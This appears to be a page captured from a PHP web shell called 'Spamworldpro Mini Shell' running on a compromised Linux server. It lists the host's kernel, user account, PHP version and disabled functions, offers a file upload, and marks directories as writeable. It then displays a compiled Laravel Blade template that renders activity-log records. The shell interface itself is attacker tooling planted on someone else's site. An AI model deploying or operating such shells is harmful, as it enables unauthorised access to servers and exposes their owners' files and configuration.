Spamworldpro Mini Shell
Spamworldpro


Server : Apache
System : Linux server2.corals.io 4.18.0-348.2.1.el8_5.x86_64 #1 SMP Mon Nov 15 09:17:08 EST 2021 x86_64
User : corals ( 1002)
PHP Version : 7.4.33
Disable Function : exec,passthru,shell_exec,system
Directory :  /home/corals/syn.corals.io/storage/framework/views/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /home/corals/syn.corals.io/storage/framework/views/ae1ba0fbc1d2d2257cbfdd6ce4b202e8beed4910.php
<div class="activity-record">
    <div class="meta-details">
        <ul class="list-inline">
            <li class="list-inline-item">
                <i class="fa fa-user-o fa-fw"></i> <?php echo $activity->present('causer_id'); ?>

            </li>
            <li class="list-inline-item">
                <i class="fa fa-clock-o fa-fw"></i> <?php echo $activity->present('created_at'); ?>

            </li>
            <li class="list-inline-item">
                <i class="fa fa-info-circle fa-fw"></i> <?php echo $activity->present('log_name'); ?>

            </li>
        </ul>
        <p>Description: <?php echo ucwords(trans($activity->description)); ?></p>
    </div>
    <div class="body">
        <?php
            $attributes = $activity->getProperties()['attributes']??[];
            $old = $activity->getProperties()['old']??[];
        ?>
        <?php if($attributes): ?>
            <?php if($old): ?>
                <strong class="text-primary">New Values</strong>
            <?php endif; ?>
            <div class="properties-table">
                <?php echo formatProperties($attributes); ?>

            </div>
        <?php endif; ?>
        <?php if($old): ?>
            <strong class="text-danger">Old Values</strong>
            <div class="properties-table">
                <?php echo formatProperties($old); ?>

            </div>
        <?php endif; ?>
    </div>
    <hr/>
</div>
<?php /**PATH /home/corals/public_html/syn.corals.io/Corals/core/Activity/resources/views/activities/partials/activity_record.blade.php ENDPATH**/ ?>

Spamworldpro Mini